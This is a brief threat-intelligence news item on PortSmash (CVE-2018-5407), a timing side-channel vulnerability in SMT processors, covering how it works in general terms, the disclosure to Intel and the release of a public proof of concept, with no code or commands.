PortSmash is a vulnerability (CVE-2018-5407) that affects Intel processors. PortSmash has been classified as a side-channel attack and it could allow attackers to leak encrypted data from the CPU’s internal processes. The vulnerability impacts any CPU that uses a SMT (Simultaneous Multithreading) architecture, which allows multiple computing threads to be executed simultaneously on a CPU core. PortSmash works by running a malicious process next to legitimate ones using simultaneous multithreading parallel thread-running capabilities. It will then leak small amounts of data from the real process, which helps the attacker reconstruct encrypted data that is processed in the legitimate process. According to researchers, “The nature of the leakage is due to execution engine sharing on SMT (e.g. Hyper-Threading) architectures. More specifically, we detect port contention to construct a timing side-channel to exfiltrate information from processes running in parallel on the same physical core.” The Intel security team was notified of the vulnerability on October 1st, however the company did not provide a patch until yesterday, November 1st. A PoC for the vulnerability has been made available on GitHub.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased